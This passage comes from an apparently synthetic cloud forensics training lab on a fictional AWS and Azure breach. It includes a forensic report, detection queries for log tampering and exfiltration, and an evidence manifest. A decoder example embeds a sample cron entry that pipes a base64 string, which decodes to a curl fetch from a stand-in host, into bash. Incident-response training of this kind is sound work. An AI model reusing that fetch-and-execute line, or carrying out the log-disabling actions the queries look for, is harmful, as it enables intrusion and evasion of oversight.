"synthetic_notice": "THIS ENTIRE DOCUMENT IS 100% SYNTHETIC — CREATED FOR TRAINING PURPOSES ONLY"
}
MASTER_COC_EOF
$ echo "[+] Master chain of custody record created with 8 evidence items"
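Before law-enforcement handoff, the master record can be machine-checked so that no evidence item is missing a field counsel will ask about. A sketch of that completeness check (the required-field list reflects this lab's record format, not a legal standard):

```python
import json

# Fields every evidence_inventory item should carry (lab convention)
REQUIRED = ("evidence_id", "description", "type", "cloud",
            "hash_algorithm", "acquisition_time", "acquired_by", "storage")

def validate_coc(path: str) -> list:
    """Return (evidence_id, missing_field) pairs for incomplete items
    in a chain-of-custody JSON shaped like the master record above."""
    with open(path) as f:
        doc = json.load(f)
    problems = []
    for item in doc.get("evidence_inventory", []):
        for field in REQUIRED:
            if not item.get(field):
                problems.append((item.get("evidence_id", "?"), field))
    return problems

# problems = validate_coc("master-chain-of-custody.json")
# An empty list means every item is complete.
```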
Step 5.4: Forensic Report¶
# FORENSIC INVESTIGATION REPORT
# Case: QFS-IR-2026-0042
# Classification: CONFIDENTIAL
# ALL DATA IS 100% SYNTHETIC — TRAINING EXERCISE ONLY
## Executive Summary
On March 24, 2026, Quantum Financial Services (fictional) detected a coordinated
multi-cloud intrusion affecting both AWS and Azure environments. The attacker
compromised the CI/CD service account `dev-jenkins-ci` (AWS) and exploited a
Managed Identity (`mi-compliance-scanner`) on an Azure compliance VM. Over
just under two hours, the attacker:
1. **Reconnaissance**: Systematically enumerated AWS IAM, EC2, S3, and Secrets
Manager resources (14:28-14:34 UTC)
2. **Credential Access**: Retrieved secrets from AWS Secrets Manager and dumped
47 secrets from Azure Key Vault including database credentials, API keys,
and cross-cloud access keys (14:34-14:38 UTC)
3. **Persistence**: Created a new AWS IAM access key and added a client secret
to an Azure Service Principal (14:36, 14:52 UTC)
4. **Lateral Movement**: Used SSM Session Manager to access the API Gateway
EC2 instance, then pivoted to the database server (15:55-15:58 UTC)
5. **Data Exfiltration**: Exported 50,000 customer records from the production
database and downloaded ~150 MB from the S3 data lake. Data was exfiltrated
to 198.51.100.99 via HTTPS (15:58-16:15 UTC)
6. **Anti-Forensics**: Attempted to disable CloudTrail logging (15:47 UTC) —
this attempt was blocked by IAM policy restrictions
### Impact Assessment
| Category | Impact | Details |
|----------|--------|---------|
| Data Breach | **CRITICAL** | 50,000+ customer PII records, financial transaction data, SOX audit reports |
| Credential Exposure | **CRITICAL** | 47 Key Vault secrets, database credentials, API keys, JWT signing keys |
| Persistence | **HIGH** | Backdoor IAM access key (AWS), backdoor SP credential (Azure) |
| Resource Abuse | **MEDIUM** | Unauthorized EC2 instance launched (potential cryptomining) |
| Compliance | **CRITICAL** | GDPR, SOX, PCI DSS breach notification required |
### Immediate Containment Actions Taken
1. Disabled compromised IAM user `dev-jenkins-ci` and both access keys
2. Revoked Managed Identity token for `mi-compliance-scanner`
3. Removed attacker-added client secret from `sp-devops-pipeline`
4. Reverted S3 bucket policy on `qfs-datalake-prod-123456789012`
5. Terminated unauthorized EC2 instance
6. Removed malicious cron job from API Gateway instance
7. Rotated all 47 compromised Key Vault secrets
8. Blocked attacker IPs 203.0.113.42 and 198.51.100.99 at network perimeter
### Root Cause
The initial access vector was a compromised CI/CD service account (`dev-jenkins-ci`)
with excessive permissions and no MFA enforcement. The access key had not been
rotated in 9+ months. The cross-cloud pivot was enabled by storing AWS credentials
in Azure Key Vault without adequate access controls on the Managed Identity.
### Recommendations
1. Enforce MFA on all service accounts (AWS IAM, Azure Service Principals)
2. Implement 90-day key rotation policy for all service account credentials
3. Apply least-privilege IAM policies — remove S3 PutBucketPolicy from CI/CD
4. Enable IMDSv2 (token-required) on all EC2 instances to prevent SSRF-based credential theft
5. Restrict Managed Identity permissions to minimum required Key Vault secrets
6. Deploy cross-cloud SIEM correlation rules (AWS + Azure unified timeline)
7. Enable S3 Block Public Access at the account level
8. Implement network segmentation between compliance VMs and production secrets
**ALL DATA IN THIS REPORT IS 100% SYNTHETIC — CREATED FOR TRAINING PURPOSES ONLY**
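Recommendation 2 (90-day key rotation) can be audited directly from an IAM credential report. A minimal sketch, assuming the standard `user`, `access_key_1_active`, and `access_key_1_last_rotated` columns returned by `aws iam get-credential-report`; the sample rows are synthetic and mirror the 9-month-old `dev-jenkins-ci` key from the root cause:

```python
import csv
import io
from datetime import datetime, timezone

MAX_KEY_AGE_DAYS = 90  # rotation policy from Recommendation 2

def stale_keys(report_csv: str, now: datetime) -> list:
    """Return users whose active access key 1 exceeds the rotation policy age."""
    stale = []
    for row in csv.DictReader(io.StringIO(report_csv)):
        rotated = row.get("access_key_1_last_rotated", "N/A")
        if row.get("access_key_1_active") != "true" or rotated in ("N/A", "not_supported"):
            continue  # no active key, or root/console-only principal
        age = now - datetime.fromisoformat(rotated.replace("Z", "+00:00"))
        if age.days > MAX_KEY_AGE_DAYS:
            stale.append(f"{row['user']} ({age.days} days)")
    return stale

# Synthetic report: dev-jenkins-ci's key is 9+ months old, matching the root cause.
REPORT = """user,access_key_1_active,access_key_1_last_rotated
dev-jenkins-ci,true,2025-06-10T00:00:00Z
sec-automation,true,2026-02-01T00:00:00Z
"""
print(stale_keys(REPORT, datetime(2026, 3, 24, tzinfo=timezone.utc)))
```

Running this against a real credential report (after `aws iam generate-credential-report`) gives a quick compliance check for the new rotation policy.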
Step 5.5: Anti-Forensics Detection Across Both Clouds¶
# ============================================================
# Step 5.5: Anti-Forensics Detection Checklist
# Comprehensive check for evidence tampering in both clouds
# ============================================================
// -----------------------------------------------------------------
// Detection: AWS CloudTrail Tampering (Cross-Cloud Sentinel Query)
// MITRE: T1562.008 — Disable or Modify Cloud Logs
// -----------------------------------------------------------------
AWSCloudTrail
| where TimeGenerated > ago(7d)
| where EventName in (
"StopLogging", "DeleteTrail", "UpdateTrail",
"PutEventSelectors", "DeleteEventDataStore",
"StopEventDataStoreIngestion",
"DisableOrganizationAdminAccount",
    "DeleteFlowLogs"
)
| extend AttemptStatus = iff(ErrorCode == "", "SUCCESS", "BLOCKED")
| project TimeGenerated, EventName, UserIdentityUserName,
SourceIpAddress, AttemptStatus, ErrorCode, ErrorMessage
| order by TimeGenerated asc
// -----------------------------------------------------------------
// Detection: Azure Diagnostic Settings Modification
// MITRE: T1562.008
// -----------------------------------------------------------------
AzureActivity
| where TimeGenerated > ago(7d)
| where OperationNameValue in (
"Microsoft.Insights/diagnosticSettings/delete",
"Microsoft.Insights/diagnosticSettings/write",
"Microsoft.OperationalInsights/workspaces/delete",
"Microsoft.SecurityInsights/alertRules/delete"
)
| project TimeGenerated, Caller, CallerIpAddress,
OperationNameValue, ActivityStatusValue,
Resource = _ResourceId
| order by TimeGenerated asc
// -----------------------------------------------------------------
// Detection: Evidence Deletion Attempts (Both Clouds)
// MITRE: T1070.004 — Indicator Removal: File Deletion
// -----------------------------------------------------------------
// AWS — S3 object deletion
AWSCloudTrail
| where TimeGenerated > ago(7d)
| where EventName in ("DeleteObject", "DeleteObjects", "DeleteBucket")
| where RequestParameters contains "cloudtrail" or
RequestParameters contains "flowlog" or
RequestParameters contains "forensic"
| project TimeGenerated, EventName, UserIdentityUserName,
SourceIpAddress, RequestParameters
// Azure — Resource deletion
AzureActivity
| where TimeGenerated > ago(7d)
| where OperationNameValue contains "delete"
| where ResourceProviderValue in (
"Microsoft.Compute", // VM/disk/snapshot deletion
"Microsoft.Storage", // Storage deletion
"Microsoft.KeyVault", // Key Vault deletion
"Microsoft.OperationalInsights" // Log Analytics deletion
)
| where ActivityStatusValue == "Success"
| project TimeGenerated, Caller, CallerIpAddress,
OperationNameValue, Resource = _ResourceId
// -----------------------------------------------------------------
// Detection: AWS CloudTrail Tampering (Splunk SPL variant)
// MITRE: T1562.008
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail"
(eventName="StopLogging" OR eventName="DeleteTrail" OR
eventName="UpdateTrail" OR eventName="PutEventSelectors" OR
eventName="DeleteEventDataStore" OR
eventName="StopEventDataStoreIngestion" OR
eventName="DeleteFlowLogs")
earliest=-7d
| eval AttemptStatus=if(isnull(errorCode) OR errorCode="", "SUCCESS", "BLOCKED")
| table _time, eventName, userIdentity.userName, sourceIPAddress,
AttemptStatus, errorCode, errorMessage
// -----------------------------------------------------------------
// Detection: Azure Diagnostic Settings Modification
// MITRE: T1562.008
// -----------------------------------------------------------------
index=azure sourcetype="azure:monitor:activity"
(operationName.value="Microsoft.Insights/diagnosticSettings/delete" OR
operationName.value="Microsoft.Insights/diagnosticSettings/write" OR
operationName.value="Microsoft.OperationalInsights/workspaces/delete" OR
operationName.value="Microsoft.SecurityInsights/alertRules/delete")
earliest=-7d
| table _time, Caller, CallerIpAddress, operationName.value,
status.value, ResourceId
// -----------------------------------------------------------------
// Detection: Evidence Deletion Attempts (Both Clouds)
// MITRE: T1070.004
// -----------------------------------------------------------------
// AWS
index=aws sourcetype="aws:cloudtrail"
(eventName="DeleteObject" OR eventName="DeleteObjects" OR
eventName="DeleteBucket")
(requestParameters="*cloudtrail*" OR requestParameters="*flowlog*" OR
requestParameters="*forensic*")
earliest=-7d
| table _time, eventName, userIdentity.userName, sourceIPAddress,
requestParameters
// Azure
index=azure sourcetype="azure:monitor:activity"
operationName.value="*delete*"
(ResourceProviderValue="Microsoft.Compute" OR
ResourceProviderValue="Microsoft.Storage" OR
ResourceProviderValue="Microsoft.KeyVault" OR
ResourceProviderValue="Microsoft.OperationalInsights")
status.value="Succeeded"
earliest=-7d
| table _time, Caller, CallerIpAddress, operationName.value, ResourceId
# Anti-Forensics Detection Summary for Case QFS-IR-2026-0042 (SYNTHETIC)
# AWS Anti-Forensics Attempts Detected:
# [BLOCKED] 2026-03-24T15:47:22Z — StopLogging (CloudTrail) by dev-jenkins-ci
# [BLOCKED] 2026-03-24T15:48:05Z — DeleteTrail (CloudTrail) by dev-jenkins-ci
# [PARTIAL] Malicious cron job used base64 encoding to hide C2 callback
# [PARTIAL] Staging directory used dotfile naming (.staging) for concealment
# Azure Anti-Forensics Attempts Detected:
# [NONE] No diagnostic settings modifications detected
# [NONE] No log deletion attempts detected
# [PARTIAL] Attacker used dotfile naming for cached tokens (.az_token_cache)
echo "[+] Anti-forensics detection scan complete"
echo "[+] 2 blocked AWS CloudTrail tampering attempts detected"
echo "[+] 0 Azure log tampering attempts detected"
echo "[+] Multiple concealment techniques identified (base64, dotfiles)"
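The base64 concealment flagged above can be unwrapped programmatically when triaging cron entries. A minimal sketch that decodes `echo <b64> | base64 -d` payloads (the regex and the sample cron line are illustrative, not an exhaustive obfuscation catalog):

```python
import base64
import binascii
import re

# Matches the shell idiom that pipes a base64 literal into a decoder.
B64_PIPE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)")

def decode_hidden_commands(crontab_text: str) -> list:
    """Decode base64 payloads hidden in cron entries (T1027 obfuscation)."""
    decoded = []
    for match in B64_PIPE.finditer(crontab_text):
        try:
            decoded.append(base64.b64decode(match.group(1)).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # matched text was not valid base64 after all
    return decoded

# Synthetic cron entry modeled on the malicious beacon job from this case.
CRON = ("*/5 * * * * echo 'Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYmVhY29u'"
        " | base64 -d | bash\n")
for cmd in decode_hidden_commands(CRON):
    print("[!] hidden command:", cmd)
```

Decoding the payload surfaces the C2 callback destination in plaintext, which can then be matched against the network IOCs from the flow-log analysis.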
Step 5.6: Evidence Preservation for Law Enforcement¶
# ============================================================
# Step 5.6: Prepare Evidence Package for Law Enforcement
# ============================================================
# Create evidence package manifest
$ cat > ~/cloud-dfir-lab24/reports/evidence-package-manifest.txt << 'MANIFEST_EOF'
============================================================
EVIDENCE PACKAGE MANIFEST
Case: QFS-IR-2026-0042
Prepared for: Law Enforcement Referral
Classification: CONFIDENTIAL
Date: 2026-03-25
============================================================
THIS IS A 100% SYNTHETIC TRAINING DOCUMENT
EVIDENCE ITEMS:
===============
E001 — AWS CloudTrail Logs
Files: 4,287 compressed JSON files
Size: 189 MB
Period: 2026-03-22 to 2026-03-25
Integrity: SHA-256 manifest (evidence_hashes_raw.sha256)
CloudTrail digest validation: 72/72 PASS
E002 — AWS EBS Snapshot (Root Volume)
Snapshot ID: snap-0a1b2c3d4e5f0001
Source: vol-0a1b2c3d4e5f0001 (i-0a1b2c3d4e5f6789a)
Size: 50 GB
Integrity: SHA-256 hash on file
E003 — AWS EBS Snapshot (Data Volume)
Snapshot ID: snap-0a1b2c3d4e5f0002
Source: vol-0a1b2c3d4e5f0002 (i-0a1b2c3d4e5f6789a)
Size: 200 GB
Integrity: SHA-256 hash on file
E004 — Memory Dump (API Gateway Instance)
Format: LiME (Linux Memory Extractor)
Size: 16 GB (compressed: 5.2 GB)
Source: i-0a1b2c3d4e5f6789a (16 GB RAM)
Acquisition tool: AVML v0.14.0 via SSM Run Command
Integrity: SHA-256 hash on file
E005 — Azure Activity Logs
Entries: 2,341
Period: 2026-03-22 to 2026-03-25
Source: Azure Monitor
Integrity: SHA-256 hash on file
E006 — Azure VM OS Disk Snapshot
Snapshot: forensic-snap-vm-compliance-01-os-20260324
Size: 128 GB (VHD format)
Source: vm-compliance-01
Integrity: SHA-256 hash on file
E007 — Azure AD Sign-In and Audit Logs
Source: Microsoft Graph API
Period: 2026-03-22 to 2026-03-25
Integrity: SHA-256 hash on file
E008 — Network Flow Logs (AWS VPC + Azure NSG)
Source: CloudWatch + Azure Storage
Period: 2026-03-24
Integrity: SHA-256 hash on file
ANALYSIS PRODUCTS:
==================
A001 — Unified cross-cloud timeline (JSON + CSV)
A002 — Attacker API call timeline (AWS, 235 events)
A003 — Memory analysis report (Volatility3 output)
A004 — Disk forensics report (plaso/log2timeline output)
A005 — Network flow analysis summary
A006 — Key Vault access audit (47 secrets enumerated)
A007 — S3 data exfiltration summary (5 files, ~220 MB)
CHAIN OF CUSTODY:
=================
All evidence items include individual chain of custody records.
Master chain of custody: master-chain-of-custody.json
Legal hold applied: AWS S3 Object Lock (COMPLIANCE) + Azure Resource Locks
TOOLS USED:
===========
AWS CLI 2.15.30, Azure CLI 2.58.0, Volatility 3 2.5.2,
AVML 0.14.0, The Sleuth Kit 4.12.1, plaso 20240301, jq 1.7,
Python 3.11
THIS IS A 100% SYNTHETIC TRAINING DOCUMENT
============================================================
MANIFEST_EOF
echo "[+] Evidence package manifest created"
echo "[+] Ready for law enforcement handoff (SYNTHETIC)"
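Before handoff, the SHA-256 manifest should re-verify cleanly on the receiving side. A minimal Python equivalent of `sha256sum -c` (the demo file names are synthetic; real runs would point at `evidence_hashes_raw.sha256` in the evidence package):

```python
import hashlib
import tempfile
from pathlib import Path

def verify_manifest(manifest_path: str) -> dict:
    """Check each '<hex>  <filename>' line of a sha256sum-style manifest.

    Files are resolved relative to the manifest; returns {filename: bool}.
    """
    results = {}
    manifest = Path(manifest_path)
    for line in manifest.read_text().splitlines():
        if not line.strip():
            continue
        expected, name = line.split(maxsplit=1)
        actual = hashlib.sha256((manifest.parent / name).read_bytes()).hexdigest()
        results[name] = (actual == expected)
    return results

# Synthetic demo: one evidence file plus its manifest in the temp directory.
tmp = Path(tempfile.gettempdir())
(tmp / "E001.json").write_bytes(b'{"synthetic": true}')
digest = hashlib.sha256(b'{"synthetic": true}').hexdigest()
(tmp / "evidence_hashes_raw.sha256").write_text(f"{digest}  E001.json\n")
for name, ok in verify_manifest(str(tmp / "evidence_hashes_raw.sha256")).items():
    print(f"{'PASS' if ok else 'FAIL'}  {name}")
```

Any FAIL result means the item cannot be handed to law enforcement as-is and must be re-acquired from the immutable copy.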
Consolidated Detection Queries¶
This section consolidates the most critical detection queries from all five exercises.
Multi-Cloud Threat Detection Dashboard¶
// =================================================================
// MASTER DETECTION: Cross-Cloud Compromised Credential Activity
// Case: QFS-IR-2026-0042 | Covers AWS + Azure
// =================================================================
// --- Panel 1: AWS Credential Abuse ---
let AWSCredentialAbuse = AWSCloudTrail
| where TimeGenerated > ago(24h)
| where SourceIpAddress !in ("10.100.2.50", "10.50.1.10")
| where EventName in (
"GetCallerIdentity", "CreateAccessKey", "AssumeRole",
"GetSecretValue", "PutBucketPolicy", "RunInstances",
"StopLogging", "DeleteTrail"
)
| summarize
EventCount = count(),
APIs = make_set(EventName),
UniqueAPIs = dcount(EventName)
by UserIdentityUserName, SourceIpAddress, bin(TimeGenerated, 1h)
| where UniqueAPIs >= 3
| extend Cloud = "AWS";
// --- Panel 2: Azure Identity Abuse ---
let AzureIdentityAbuse = union
(AzureActivity
| where TimeGenerated > ago(24h)
| where OperationNameValue in (
"Microsoft.KeyVault/vaults/secrets/read",
"Microsoft.Storage/storageAccounts/listKeys/action",
"Microsoft.Authorization/roleAssignments/write"
)
| summarize
EventCount = count(),
APIs = make_set(OperationNameValue),
UniqueAPIs = dcount(OperationNameValue)
by Caller, CallerIpAddress, bin(TimeGenerated, 1h)
| where UniqueAPIs >= 2
| extend Cloud = "Azure"),
(AuditLogs
| where TimeGenerated > ago(24h)
| where OperationName in (
"Add service principal credentials",
"Add member to role",
"Consent to application"
)
| extend Caller = tostring(InitiatedBy.app.displayName)
| extend CallerIpAddress = tostring(InitiatedBy.app.ipAddress)
| summarize
EventCount = count(),
APIs = make_set(OperationName),
UniqueAPIs = dcount(OperationName)
by Caller, CallerIpAddress, bin(TimeGenerated, 1h)
| extend Cloud = "Azure");
// --- Combined View ---
union AWSCredentialAbuse, AzureIdentityAbuse
| project TimeGenerated, Cloud, Caller = coalesce(UserIdentityUserName, Caller),
SourceIP = coalesce(SourceIpAddress, CallerIpAddress),
EventCount, UniqueAPIs, APIs
| order by TimeGenerated asc
// =================================================================
// MASTER DETECTION: Cross-Cloud Data Exfiltration
// =================================================================
let AWSExfil = AWSVPCFlow
| where TimeGenerated > ago(24h)
| where FlowDirection == "O"
| where not(ipv4_is_private(DstAddr))  // RFC 1918: 10/8, 172.16/12, 192.168/16
| summarize TotalBytes = sum(Bytes) by SrcAddr, DstAddr,
bin(TimeGenerated, 15m)
| where TotalBytes > 10000000
| extend Cloud = "AWS", TotalMB = round(TotalBytes / 1048576.0, 1);
let AzureExfil = AzureNetworkAnalytics_CL
| where TimeGenerated > ago(24h)
| where FlowDirection_s == "O"
| where not(ipv4_is_private(DestIP_s))  // RFC 1918 check; a "172." prefix test would over-match
| summarize TotalBytes = sum(tolong(BytesSent_d))
by SrcIP_s, DestIP_s, bin(TimeGenerated, 15m)
| where TotalBytes > 10000000
| extend Cloud = "Azure", TotalMB = round(TotalBytes / 1048576.0, 1),
SrcAddr = SrcIP_s, DstAddr = DestIP_s;
union AWSExfil, AzureExfil
| project TimeGenerated, Cloud, SrcAddr, DstAddr, TotalMB
| order by TotalMB desc
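The same aggregation logic (15-minute bins, >10 MB outbound to non-private destinations) can be mirrored in plain Python for ad-hoc flow analysis, using real CIDR checks via the `ipaddress` module (172.16.0.0/12 spans only 172.16-172.31, so simple string-prefix tests would over-match). The flow tuples below are synthetic:

```python
import ipaddress
from collections import defaultdict

PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
THRESHOLD_BYTES = 10_000_000   # same 10 MB-per-bin threshold as the query
BIN_SECONDS = 900              # 15-minute bins

def exfil_candidates(flows):
    """flows: iterable of (epoch_seconds, src_ip, dst_ip, bytes_sent).

    Aggregates outbound bytes per (15-min bin, src, dst) and returns
    rows above the threshold, largest first.
    """
    totals = defaultdict(int)
    for ts, src, dst, nbytes in flows:
        if any(ipaddress.ip_address(dst) in net for net in PRIVATE_NETS):
            continue  # internal destination -- not an exfil candidate
        totals[(ts - ts % BIN_SECONDS, src, dst)] += nbytes
    return sorted(((*key, total) for key, total in totals.items()
                   if total > THRESHOLD_BYTES),
                  key=lambda row: -row[3])

# Synthetic flows: staging host pushing ~150 MB to 198.51.100.99,
# plus one large internal transfer that must be ignored.
flows = [(1774000000 + i, "10.0.2.15", "198.51.100.99", 3_000_000)
         for i in range(50)]
flows.append((1774000000, "10.0.2.15", "10.0.3.20", 50_000_000))
for row in exfil_candidates(flows):
    print(row)
```

This is useful when flow logs have already been exported to the forensic workstation and a SIEM round-trip is unnecessary.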
// =================================================================
// MASTER DETECTION: Cross-Cloud Anti-Forensics
// =================================================================
let AWSAntiForensics = AWSCloudTrail
| where TimeGenerated > ago(7d)
| where EventName in (
"StopLogging", "DeleteTrail", "UpdateTrail",
"PutEventSelectors", "DeleteFlowLogs"
)
| extend Cloud = "AWS",
AttemptStatus = iff(ErrorCode == "", "SUCCESS", "BLOCKED"),
Actor = UserIdentityUserName,
SourceIP = SourceIpAddress,
Action = EventName;
let AzureAntiForensics = AzureActivity
| where TimeGenerated > ago(7d)
| where OperationNameValue in (
"Microsoft.Insights/diagnosticSettings/delete",
"Microsoft.OperationalInsights/workspaces/delete",
"Microsoft.SecurityInsights/alertRules/delete"
)
| extend Cloud = "Azure",
AttemptStatus = ActivityStatusValue,
Actor = Caller,
SourceIP = CallerIpAddress,
Action = OperationNameValue;
union AWSAntiForensics, AzureAntiForensics
| project TimeGenerated, Cloud, Actor, SourceIP, Action, AttemptStatus
| order by TimeGenerated asc
// =================================================================
// MASTER DETECTION: Cross-Cloud Compromised Credential Activity (Splunk SPL)
// =================================================================
// --- AWS Credential Abuse ---
index=aws sourcetype="aws:cloudtrail"
(eventName="GetCallerIdentity" OR eventName="CreateAccessKey" OR
eventName="AssumeRole" OR eventName="GetSecretValue" OR
eventName="PutBucketPolicy" OR eventName="RunInstances" OR
eventName="StopLogging" OR eventName="DeleteTrail")
NOT sourceIPAddress IN ("10.100.2.50", "10.50.1.10")
earliest=-24h
| bin _time span=1h
| stats
    count as EventCount,
    values(eventName) as APIs,
    dc(eventName) as UniqueAPIs
  by _time, userIdentity.userName, sourceIPAddress
| where UniqueAPIs >= 3
| eval Cloud="AWS"
| rename userIdentity.userName as Caller, sourceIPAddress as SourceIP
| append [
// --- Azure Identity Abuse ---
search index=azure sourcetype="azure:monitor:activity"
(operationName.value="Microsoft.KeyVault/vaults/secrets/read" OR
operationName.value="Microsoft.Storage/storageAccounts/listKeys/action" OR
operationName.value="Microsoft.Authorization/roleAssignments/write")
earliest=-24h
| bin _time span=1h
| stats
    count as EventCount,
    values(operationName.value) as APIs,
    dc(operationName.value) as UniqueAPIs
  by _time, Caller, CallerIpAddress
| where UniqueAPIs >= 2
| eval Cloud="Azure"
| rename CallerIpAddress as SourceIP
]
| table _time, Cloud, Caller, SourceIP, EventCount, UniqueAPIs, APIs
| sort _time
// =================================================================
// MASTER DETECTION: Cross-Cloud Data Exfiltration (Splunk SPL)
// =================================================================
index=aws sourcetype="aws:cloudwatchlogs:vpcflow" action=ACCEPT
earliest=-24h
| where NOT (cidrmatch("10.0.0.0/8", dest_ip) OR
cidrmatch("172.16.0.0/12", dest_ip) OR
cidrmatch("192.168.0.0/16", dest_ip))
| bin _time span=15m
| stats sum(bytes) as TotalBytes by _time, src_ip, dest_ip
| where TotalBytes > 10000000
| eval Cloud="AWS", TotalMB=round(TotalBytes/1048576, 1)
| rename src_ip as SrcAddr, dest_ip as DstAddr
| append [
search index=azure sourcetype="azure:nsg:flowlogs"
FlowDirection="O"
earliest=-24h
| where NOT (cidrmatch("10.0.0.0/8", DestIP) OR
cidrmatch("172.16.0.0/12", DestIP) OR
cidrmatch("192.168.0.0/16", DestIP))
| bin _time span=15m
| stats sum(BytesSent) as TotalBytes by _time, SrcIP, DestIP
| where TotalBytes > 10000000
| eval Cloud="Azure", TotalMB=round(TotalBytes/1048576, 1)
| rename SrcIP as SrcAddr, DestIP as DstAddr
]
| table _time, Cloud, SrcAddr, DstAddr, TotalMB
| sort -TotalMB
// =================================================================
// MASTER DETECTION: Cross-Cloud Anti-Forensics (Splunk SPL)
// =================================================================
index=aws sourcetype="aws:cloudtrail"
(eventName="StopLogging" OR eventName="DeleteTrail" OR
eventName="UpdateTrail" OR eventName="PutEventSelectors" OR
eventName="DeleteFlowLogs")
earliest=-7d
| eval Cloud="AWS",
AttemptStatus=if(isnull(errorCode) OR errorCode="", "SUCCESS", "BLOCKED"),
       Actor='userIdentity.userName',
SourceIP=sourceIPAddress,
Action=eventName
| append [
search index=azure sourcetype="azure:monitor:activity"
(operationName.value="Microsoft.Insights/diagnosticSettings/delete" OR
operationName.value="Microsoft.OperationalInsights/workspaces/delete" OR
operationName.value="Microsoft.SecurityInsights/alertRules/delete")
earliest=-7d
  | eval Cloud="Azure", AttemptStatus='status.value',
         Actor=Caller, SourceIP=CallerIpAddress,
         Action='operationName.value'
]
| table _time, Cloud, Actor, SourceIP, Action, AttemptStatus
| sort _time
MITRE ATT&CK Mapping¶
| Technique ID | Technique Name | Exercise | Detection Method |
|---|---|---|---|
| T1078.004 | Valid Accounts: Cloud Accounts | Ex. 1, 3 | CloudTrail/Activity Log source IP anomaly |
| T1087.004 | Account Discovery: Cloud Account | Ex. 1 | IAM enumeration API burst detection |
| T1580 | Cloud Infrastructure Discovery | Ex. 1 | EC2/VPC describe API burst detection |
| T1530 | Data from Cloud Storage | Ex. 1, 2 | S3 GetObject volume anomaly |
| T1562.008 | Impair Defenses: Disable Cloud Logs | Ex. 1, 5 | CloudTrail StopLogging/DeleteTrail |
| T1098.001 | Account Manipulation: Additional Cloud Credentials | Ex. 1, 3 | CreateAccessKey, Add SP credentials |
| T1552.005 | Unsecured Credentials: Cloud Instance Metadata | Ex. 2, 4 | IMDS token request detection |
| T1552.001 | Unsecured Credentials: Credentials in Files | Ex. 3, 4 | Key Vault mass secret read |
| T1059.004 | Command and Scripting Interpreter: Unix Shell | Ex. 2 | SSM session + bash reverse shell |
| T1005 | Data from Local System | Ex. 2, 4 | Database export via psql |
| T1048 | Exfiltration Over Alternative Protocol | Ex. 2 | VPC Flow large outbound transfer |
| T1071.001 | Application Layer Protocol: Web Protocols | Ex. 2 | HTTPS exfiltration to external IP |
| T1570 | Lateral Tool Transfer | Ex. 2 | SSM Session Manager to EC2 |
| T1550.001 | Use Alternate Authentication Material | Ex. 3 | Managed Identity token abuse |
| T1528 | Steal Application Access Token | Ex. 3, 4 | IMDS OAuth token theft |
| T1556.006 | Modify Authentication Process: MFA | Ex. 3 | Service Principal credential addition |
| T1098.003 | Account Manipulation: Additional Cloud Roles | Ex. 3 | Role assignment attempt |
| T1046 | Network Service Discovery | Ex. 4 | NSG Flow Log unusual port scanning |
| T1613 | Container and Resource Discovery | Ex. 4 | AKS secrets listing, pod exec |
| T1609 | Container Administration Command | Ex. 4 | kubectl exec from non-AKS IP |
| T1070.004 | Indicator Removal: File Deletion | Ex. 5 | S3/Azure resource deletion attempts |
Security Controls Implemented¶
| Category | Before Investigation | After Investigation |
|---|---|---|
| CloudTrail Logging | Enabled, single trail | Validated, log integrity confirmed |
| IAM Key Rotation | No policy (9+ month keys) | 90-day mandatory rotation |
| Service Account MFA | Not enforced | Required for all service accounts |
| S3 Public Access | Per-bucket policy | Account-level Block Public Access |
| EC2 IMDS | v1 (no token required) | v2 enforced (token required) |
| Managed Identity Scope | Broad Key Vault access | Least-privilege secret access |
| Azure Diagnostic Settings | Partial coverage | Full coverage + immutable storage |
| Cross-Cloud Monitoring | Siloed cloud monitoring | Unified Sentinel with AWS connector |
| Legal Hold Procedures | None documented | Automated with S3 Object Lock + Resource Locks |
| IR Playbook | Single-cloud only | Cross-cloud DFIR playbook with timeline merger |
Lab Summary¶
Key Takeaways¶
- **Cloud forensics requires different tools but the same principles** -- chain of custody, evidence integrity, and timeline analysis apply to cloud environments just as they do to traditional on-premises investigations
- **Log integrity validation is critical** -- always verify CloudTrail digest files and Azure diagnostic settings before relying on log data for forensic conclusions
- **Memory acquisition in the cloud is time-sensitive** -- use SSM Run Command (AWS) or VM extensions (Azure) with AVML/LiME to capture volatile evidence before instance termination or reboot
- **Cross-cloud attacks exploit credential sharing** -- storing cloud credentials across providers (AWS keys in Azure Key Vault, Azure secrets in AWS Secrets Manager) creates pivot paths that attackers actively exploit
- **Anti-forensics detection should be your first analysis step** -- check for CloudTrail StopLogging, diagnostic settings deletion, and log tampering before trusting any log source
- **Unified timelines reveal attack patterns** -- correlating AWS CloudTrail and Azure Activity Logs on the same timeline exposed the simultaneous multi-cloud nature of this attack, which single-cloud analysis would have missed
- **Legal hold automation prevents evidence loss** -- S3 Object Lock (COMPLIANCE mode) and Azure Resource Locks with immutable storage ensure evidence survives even if an attacker or careless administrator attempts deletion
- **IMDS credential theft is a top cloud threat** -- both AWS and Azure instance metadata services expose credentials to anything running on a compromised VM; enforce IMDSv2 and restrict Managed Identity scopes
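The unified-timeline takeaway reduces to a normalize-and-merge pattern: map each cloud's event schema onto common fields, then sort by timestamp. A minimal sketch; the field names mirror CloudTrail and Azure Activity Log JSON, and the two sample events are synthetic:

```python
from datetime import datetime

def normalize_aws(event: dict) -> dict:
    """Map a CloudTrail record onto the common timeline schema."""
    return {"time": datetime.fromisoformat(event["eventTime"].replace("Z", "+00:00")),
            "cloud": "AWS", "actor": event["userIdentity"]["userName"],
            "action": event["eventName"], "source_ip": event["sourceIPAddress"]}

def normalize_azure(event: dict) -> dict:
    """Map an Azure Activity Log record onto the common timeline schema."""
    return {"time": datetime.fromisoformat(event["eventTimestamp"].replace("Z", "+00:00")),
            "cloud": "Azure", "actor": event["caller"],
            "action": event["operationName"], "source_ip": event["callerIpAddress"]}

def unified_timeline(aws_events: list, azure_events: list) -> list:
    """Merge both clouds' events into one chronological record list."""
    merged = [normalize_aws(e) for e in aws_events] + \
             [normalize_azure(e) for e in azure_events]
    return sorted(merged, key=lambda record: record["time"])

# Synthetic events echoing this case: Key Vault dump precedes backdoor key creation.
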